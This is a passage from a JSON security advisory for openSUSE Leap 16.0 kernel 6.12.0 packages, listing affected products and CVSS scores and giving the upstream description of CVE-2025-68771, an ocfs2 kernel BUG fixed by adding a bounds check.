"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
